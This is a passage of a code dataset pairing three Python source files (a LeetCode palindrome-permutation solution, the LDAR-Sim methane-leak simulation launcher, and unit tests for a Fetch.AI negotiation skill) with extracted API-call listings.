code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
__source__ = 'https://leetcode.com/problems/palindrome-permutation/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/palindrome-permutation.py
# Time: O(n)
# Space: O(1)
#
# Description: Leetcode # 266. Palindrome Permutation
#
# Given a string, determine if a permutation of the string could form a palindrome.
#
# For example,
# "code" -> False, "aab" -> True, "carerac" -> True.
#
# Hint:
#
# Consider the palindromes of odd vs even length. What difference do you notice?
# Count the frequency of each character.
# If each character occurs even number of times,
# then it must be a palindrome. How about character which occurs odd number of times?
#
# #count of odd number char < 2
# Companies
# Google Uber Bloomberg
# Related Topics
# Hash Table
# Similar Questions
# Longest Palindromic Substring Valid Anagram Palindrome Permutation II Longest Palindrome
#
import unittest
import collections
# 20ms 99.07%
class Solution(object):
def canPermutePalindrome(self, s):
"""
:type s: str
:rtype: bool
"""
# print collections.Counter(s).values()
return sum(v % 2 for v in collections.Counter(s).values()) < 2
# 20ms 99.07%
from collections import defaultdict
class Solution2(object):
def canPermutePalindrome(self, s):
"""
:type s: str
:rtype: bool
"""
dict = defaultdict(int)
for char in s:
dict[char] = dict[char] + 1
odd = 0
for cnt in dict.values():
if cnt % 2 == 1:
odd += 1
if odd > 1:
return False
return True
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
# Java solution
Java = '''
# Thought: https://leetcode.com/problems/palindrome-permutation/solution/
#
Time complexity : O(n). We traverse over the string ss of length nn once only.
Space complexity : O(n). The setset can grow upto a maximum size of nn in case of all distinct elements.
The idea is to iterate over string, adding current character to set if set doesn't contain that character,
or removing current character from set if set contains it.
When the iteration is finished, just return set.size()==0 || set.size()==1.
set.size()==0 corresponds to the situation when there are even number of any character in the string, and
set.size()==1 corresponsds to the fact that there are even number of any character except one.
# 1ms 65.75%
class Solution {
public boolean canPermutePalindrome(String s) {
Set<Character> set=new HashSet<Character>();
for(int i=0; i<s.length(); ++i){
if (!set.contains(s.charAt(i)))
set.add(s.charAt(i));
else
set.remove(s.charAt(i));
}
return set.size()==0 || set.size()==1;
}
}
# same as above
class Solution {
public boolean canPermutePalindrome(String s) {
Set<Character> set = new HashSet();
for (int i = 0; i < s.length(); i++) {
if (!set.add(s.charAt(i))) {
set.remove(s.charAt(i));
}
}
return set.size() <= 1;
}
}
# 1ms 65.75%
class Solution {
public boolean canPermutePalindrome(String s) {
BitSet bs = new BitSet();
for (byte b : s.getBytes())
bs.flip(b);
return bs.cardinality() < 2;
}
}
# count char with boolean[128]
# 0ms 100%
class Solution {
public boolean canPermutePalindrome(String s) {
boolean[] arr = new boolean[128];
for (int i = 0; i < s.length(); i++) {
char c = s.charAt(i);
arr[c] = !arr[c];
}
boolean odd = false;
for (int i = 0; i < 128; i++) {
if (arr[i]) {
if (odd) { //2 occurrence of odd char count
return false;
} else {
odd = true;
}
}
}
return true;
}
}
# 0ms 100%
class Solution {
public boolean canPermutePalindrome(String s) {
if (s == null || s.length() == 0) return true;
int[] map = new int[128]; //or use 256 depending on encoding
int count = 0;
for (int i = 0; i < s.length(); i++) {
map[s.charAt(i)]++;
if ( (map[s.charAt(i)] & 1) == 0) { //%2 ==0
count--;
} else {
count++;
}
}
return count <= 1;
}
}
'''
| [
"unittest.main",
"collections.defaultdict",
"collections.Counter"
] | [((1764, 1779), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1777, 1779), False, 'import unittest\n'), ((1377, 1393), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (1388, 1393), False, 'from collections import defaultdict\n'), ((1144, 1166), 'collections.Counter', 'collections.Counter', (['s'], {}), '(s)\n', (1163, 1166), False, 'import collections\n')] |
# ------------------------------------------------------------------------------
# Program: The LDAR Simulator (LDAR-Sim)
# File: LDAR-Sim main
# Purpose: Interface for parameterizing and running LDAR-Sim.
#
# Copyright (C) 2018-2021 Intelligent Methane Monitoring and Management System (IM3S) Group
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the MIT License as published
# by the Free Software Foundation, version 3.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
# You should have received a copy of the MIT License
# along with this program. If not, see <https://opensource.org/licenses/MIT>.
#
# ------------------------------------------------------------------------------
import datetime
import json
import multiprocessing as mp
import os
import shutil
from pathlib import Path
from economics.cost_mitigation import cost_mitigation
from initialization.args import files_from_args, get_abs_path
from initialization.input_manager import InputManager
from initialization.sims import create_sims
from initialization.sites import init_generator_files
from ldar_sim_run import ldar_sim_run
from out_processing.batch_reporting import BatchReporting
from out_processing.prog_table import generate as gen_prog_table
from utils.generic_functions import check_ERA5_file
opening_msg = """
You are running LDAR-Sim version 2.0 an open sourced software (MIT) license.
It is continually being developed by the University of Calgary's Intelligent
Methane Monitoring and Management System (IM3S) Group.
Provide any issues, comments, questions, or recommendations to the IM3S by
adding an issue to https://github.com/LDAR-Sim/LDAR_Sim.git.
"""
if __name__ == '__main__':
print(opening_msg)
# Get route directory , which is parent folder of ldar_sim_main file
# Set current working directory directory to root directory
root_dir = Path(os.path.dirname(os.path.realpath(__file__))).parent
os.chdir(root_dir)
# --- Retrieve input parameters and parse ---
parameter_filenames = files_from_args(root_dir)
input_manager = InputManager()
sim_params = input_manager.read_and_validate_parameters(parameter_filenames)
# --- Assign local variabls
ref_program = sim_params['reference_program']
base_program = sim_params['baseline_program']
in_dir = get_abs_path(sim_params['input_directory'])
out_dir = get_abs_path(sim_params['output_directory'])
programs = sim_params.pop('programs')
# --- Run Checks ----
check_ERA5_file(in_dir, programs)
has_ref = ref_program in programs
has_base = base_program in programs
# --- Setup Output folder
if os.path.exists(out_dir):
shutil.rmtree(out_dir)
os.makedirs(out_dir)
input_manager.write_parameters(out_dir / 'parameters.yaml')
# If leak generator is used and there are generated files, user is prompted
# to use files, If they say no, the files will be removed
if sim_params['pregenerate_leaks']:
generator_dir = in_dir / "generator"
init_generator_files(
generator_dir, input_manager.simulation_parameters, in_dir, programs[base_program])
else:
generator_dir = None
# --- Create simulations ---
simulations = create_sims(sim_params, programs, generator_dir, in_dir, out_dir, input_manager)
# --- Run simulations (in parallel) --
with mp.Pool(processes=sim_params['n_processes']) as p:
sim_outputs = p.starmap(ldar_sim_run, simulations)
# ---- Generate Outputs ----
# Do batch reporting
print("....Generating output data")
if sim_params['write_data']:
# Create a data object...
if has_ref & has_base:
print("....Generating cost mitigation outputs")
cost_mitigation = cost_mitigation(sim_outputs, ref_program, base_program, out_dir)
reporting_data = BatchReporting(
out_dir, sim_params['start_date'], ref_program, base_program)
if sim_params['n_simulations'] > 1:
reporting_data.program_report()
if len(programs) > 1:
print("....Generating program comparison plots")
reporting_data.batch_report()
reporting_data.batch_plots()
else:
print('No reference or base program input...skipping batch reporting and economics.')
# Generate output table
print("....Exporting summary statistic tables")
out_prog_table = gen_prog_table(sim_outputs, base_program, programs)
with open(out_dir / 'prog_table.json', 'w') as fp:
json.dump(out_prog_table, fp)
# Write program metadata
metadata = open(out_dir / '_metadata.txt', 'w')
metadata.write(str(programs) + '\n' +
str(datetime.datetime.now()))
metadata.close()
| [
"os.path.exists",
"initialization.sims.create_sims",
"os.makedirs",
"out_processing.prog_table.generate",
"initialization.args.get_abs_path",
"json.dump",
"economics.cost_mitigation.cost_mitigation",
"out_processing.batch_reporting.BatchReporting",
"utils.generic_functions.check_ERA5_file",
"os.ch... | [((2156, 2174), 'os.chdir', 'os.chdir', (['root_dir'], {}), '(root_dir)\n', (2164, 2174), False, 'import os\n'), ((2252, 2277), 'initialization.args.files_from_args', 'files_from_args', (['root_dir'], {}), '(root_dir)\n', (2267, 2277), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2298, 2312), 'initialization.input_manager.InputManager', 'InputManager', ([], {}), '()\n', (2310, 2312), False, 'from initialization.input_manager import InputManager\n'), ((2540, 2583), 'initialization.args.get_abs_path', 'get_abs_path', (["sim_params['input_directory']"], {}), "(sim_params['input_directory'])\n", (2552, 2583), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2598, 2642), 'initialization.args.get_abs_path', 'get_abs_path', (["sim_params['output_directory']"], {}), "(sim_params['output_directory'])\n", (2610, 2642), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2716, 2749), 'utils.generic_functions.check_ERA5_file', 'check_ERA5_file', (['in_dir', 'programs'], {}), '(in_dir, programs)\n', (2731, 2749), False, 'from utils.generic_functions import check_ERA5_file\n'), ((2866, 2889), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (2880, 2889), False, 'import os\n'), ((2926, 2946), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (2937, 2946), False, 'import os\n'), ((3455, 3540), 'initialization.sims.create_sims', 'create_sims', (['sim_params', 'programs', 'generator_dir', 'in_dir', 'out_dir', 'input_manager'], {}), '(sim_params, programs, generator_dir, in_dir, out_dir, input_manager\n )\n', (3466, 3540), False, 'from initialization.sims import create_sims\n'), ((4691, 4742), 'out_processing.prog_table.generate', 'gen_prog_table', (['sim_outputs', 'base_program', 'programs'], {}), '(sim_outputs, base_program, programs)\n', (4705, 4742), True, 'from out_processing.prog_table import generate as gen_prog_table\n'), ((2899, 2921), 'shutil.rmtree', 'shutil.rmtree', (['out_dir'], {}), '(out_dir)\n', (2912, 2921), False, 'import shutil\n'), ((3247, 3355), 'initialization.sites.init_generator_files', 'init_generator_files', (['generator_dir', 'input_manager.simulation_parameters', 'in_dir', 'programs[base_program]'], {}), '(generator_dir, input_manager.simulation_parameters,\n in_dir, programs[base_program])\n', (3267, 3355), False, 'from initialization.sites import init_generator_files\n'), ((3589, 3633), 'multiprocessing.Pool', 'mp.Pool', ([], {'processes': "sim_params['n_processes']"}), "(processes=sim_params['n_processes'])\n", (3596, 3633), True, 'import multiprocessing as mp\n'), ((4807, 4836), 'json.dump', 'json.dump', (['out_prog_table', 'fp'], {}), '(out_prog_table, fp)\n', (4816, 4836), False, 'import json\n'), ((3987, 4051), 'economics.cost_mitigation.cost_mitigation', 'cost_mitigation', (['sim_outputs', 'ref_program', 'base_program', 'out_dir'], {}), '(sim_outputs, ref_program, base_program, out_dir)\n', (4002, 4051), False, 'from economics.cost_mitigation import cost_mitigation\n'), ((4081, 4157), 'out_processing.batch_reporting.BatchReporting', 'BatchReporting', (['out_dir', "sim_params['start_date']", 'ref_program', 'base_program'], {}), "(out_dir, sim_params['start_date'], ref_program, base_program)\n", (4095, 4157), False, 'from out_processing.batch_reporting import BatchReporting\n'), ((2116, 2142), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (2132, 2142), False, 'import os\n'), ((4984, 5007), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5005, 5007), False, 'import datetime\n')] |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the helpers module of the tac negotiation."""
from pathlib import Path
from aea.helpers.search.models import (
Attribute,
Constraint,
ConstraintType,
DataModel,
Description,
)
from aea.test_tools.test_skill import BaseSkillTestCase
from packages.fetchai.skills.tac_negotiation.helpers import (
DEMAND_DATAMODEL_NAME,
SUPPLY_DATAMODEL_NAME,
_build_goods_datamodel,
build_goods_description,
build_goods_query,
)
from tests.conftest import ROOT_DIR
class TestHelpers(BaseSkillTestCase):
"""Test Helper module methods of tac control."""
path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "tac_negotiation")
@classmethod
def setup(cls):
"""Setup the test class."""
super().setup()
def test_build_goods_datamodel_supply(self):
"""Test the _build_goods_datamodel of Helpers module for a supply."""
good_ids = ["1", "2"]
is_supply = True
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_datamodel_demand(self):
"""Test the _build_goods_datamodel of Helpers module for a demand."""
good_ids = ["1", "2"]
is_supply = False
attributes = [
Attribute("1", int, True, "A good on offer."),
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
actual_data_model = _build_goods_datamodel(good_ids, is_supply)
assert actual_data_model == expected_data_model
def test_build_goods_description_supply(self):
"""Test the build_goods_description of Helpers module for supply."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_description_demand(self):
"""Test the build_goods_description of Helpers module for demand (same as above)."""
quantities_by_good_id = {"2": 5, "3": 10}
currency_id = "1"
ledger_id = "some_ledger_id"
is_supply = False
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(DEMAND_DATAMODEL_NAME, attributes)
expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
expected_values.update(quantities_by_good_id)
expected_description = Description(expected_values, expected_data_model)
actual_description = build_goods_description(
quantities_by_good_id, currency_id, ledger_id, is_supply
)
assert actual_description == expected_description
def test_build_goods_query(self):
"""Test the build_goods_query of Helpers module."""
good_ids = ["2", "3"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("3", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("3", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
constraints = [
(c.constraint_type.type, c.constraint_type.value)
for c in actual_query.constraints[0].constraints
]
for constraint in expected_constraints:
assert (
constraint.constraint_type.type,
constraint.constraint_type.value,
) in constraints
assert actual_query.model == expected_data_model
def test_build_goods_query_1_good(self):
"""Test the build_goods_query of Helpers module where there is 1 good."""
good_ids = ["2"]
currency_id = "1"
ledger_id = "some_ledger_id"
is_searching_for_sellers = True
attributes = [
Attribute("2", int, True, "A good on offer."),
Attribute("ledger_id", str, True, "The ledger for transacting."),
Attribute(
"currency_id",
str,
True,
"The currency for pricing and transacting the goods.",
),
Attribute("price", int, False, "The price of the goods in the currency."),
Attribute(
"fee",
int,
False,
"The transaction fee payable by the buyer in the currency.",
),
Attribute(
"nonce", str, False, "The nonce to distinguish identical descriptions."
),
]
expected_data_model = DataModel(SUPPLY_DATAMODEL_NAME, attributes)
expected_constraints = [
Constraint("2", ConstraintType(">=", 1)),
Constraint("ledger_id", ConstraintType("==", ledger_id)),
Constraint("currency_id", ConstraintType("==", currency_id)),
]
actual_query = build_goods_query(
good_ids, currency_id, ledger_id, is_searching_for_sellers
)
for constraint in expected_constraints:
assert constraint in actual_query.constraints
assert actual_query.model == expected_data_model
| [
"packages.fetchai.skills.tac_negotiation.helpers.build_goods_query",
"aea.helpers.search.models.DataModel",
"pathlib.Path",
"aea.helpers.search.models.ConstraintType",
"aea.helpers.search.models.Description",
"aea.helpers.search.models.Attribute",
"packages.fetchai.skills.tac_negotiation.helpers.build_g... | [((1436, 1502), 'pathlib.Path', 'Path', (['ROOT_DIR', '"""packages"""', '"""fetchai"""', '"""skills"""', '"""tac_negotiation"""'], {}), "(ROOT_DIR, 'packages', 'fetchai', 'skills', 'tac_negotiation')\n", (1440, 1502), False, 'from pathlib import Path\n'), ((2621, 2665), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (2630, 2665), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2694, 2737), 'packages.fetchai.skills.tac_negotiation.helpers._build_goods_datamodel', '_build_goods_datamodel', (['good_ids', 'is_supply'], {}), '(good_ids, is_supply)\n', (2716, 2737), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((3815, 3859), 'aea.helpers.search.models.DataModel', 'DataModel', (['DEMAND_DATAMODEL_NAME', 'attributes'], {}), '(DEMAND_DATAMODEL_NAME, attributes)\n', (3824, 3859), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3888, 3931), 'packages.fetchai.skills.tac_negotiation.helpers._build_goods_datamodel', '_build_goods_datamodel', (['good_ids', 'is_supply'], {}), '(good_ids, is_supply)\n', (3910, 3931), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((5093, 5137), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (5102, 5137), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5302, 5351), 'aea.helpers.search.models.Description', 'Description', (['expected_values', 'expected_data_model'], {}), '(expected_values, expected_data_model)\n', (5313, 5351), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5382, 5467), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_description', 'build_goods_description', (['quantities_by_good_id', 'currency_id', 'ledger_id', 'is_supply'], {}), '(quantities_by_good_id, currency_id, ledger_id,\n is_supply)\n', (5405, 5467), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((6666, 6710), 'aea.helpers.search.models.DataModel', 'DataModel', (['DEMAND_DATAMODEL_NAME', 'attributes'], {}), '(DEMAND_DATAMODEL_NAME, attributes)\n', (6675, 6710), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6875, 6924), 'aea.helpers.search.models.Description', 'Description', (['expected_values', 'expected_data_model'], {}), '(expected_values, expected_data_model)\n', (6886, 6924), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6955, 7040), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_description', 'build_goods_description', (['quantities_by_good_id', 'currency_id', 'ledger_id', 'is_supply'], {}), '(quantities_by_good_id, currency_id, ledger_id,\n is_supply)\n', (6978, 7040), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((8187, 8231), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (8196, 8231), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8552, 8629), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_query', 'build_goods_query', (['good_ids', 'currency_id', 'ledger_id', 'is_searching_for_sellers'], {}), '(good_ids, currency_id, ledger_id, is_searching_for_sellers)\n', (8569, 8629), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((10099, 10143), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (10108, 10143), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10410, 10487), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_query', 'build_goods_query', (['good_ids', 'currency_id', 'ledger_id', 'is_searching_for_sellers'], {}), '(good_ids, currency_id, ledger_id, is_searching_for_sellers)\n', (10427, 10487), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((1819, 1864), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""1"""', 'int', '(True)', '"""A good on offer."""'], {}), "('1', int, True, 'A good on offer.')\n", (1828, 1864), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((1878, 1923), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (1887, 1923), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((1937, 2001), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (1946, 2001), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2015, 2109), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (2024, 2109), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2198, 2271), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (2207, 2271), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2285, 2378), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (2294, 2378), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2467, 2553), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (2476, 2553), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3013, 3058), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""1"""', 'int', '(True)', '"""A good on offer."""'], {}), "('1', int, True, 'A good on offer.')\n", (3022, 3058), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3072, 3117), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (3081, 3117), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3131, 3195), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (3140, 3195), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3209, 3303), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (3218, 3303), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3392, 3465), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (3401, 3465), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3479, 3572), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (3488, 3572), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3661, 3747), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (3670, 3747), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4291, 4336), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (4300, 4336), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4350, 4395), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (4359, 4395), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4409, 4473), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (4418, 4473), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4487, 4581), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (4496, 4581), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4670, 4743), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (4679, 4743), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4757, 4850), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (4766, 4850), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4939, 5025), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (4948, 5025), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5864, 5909), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (5873, 5909), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5923, 5968), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (5932, 5968), False, 'from aea.helpers.search.models import 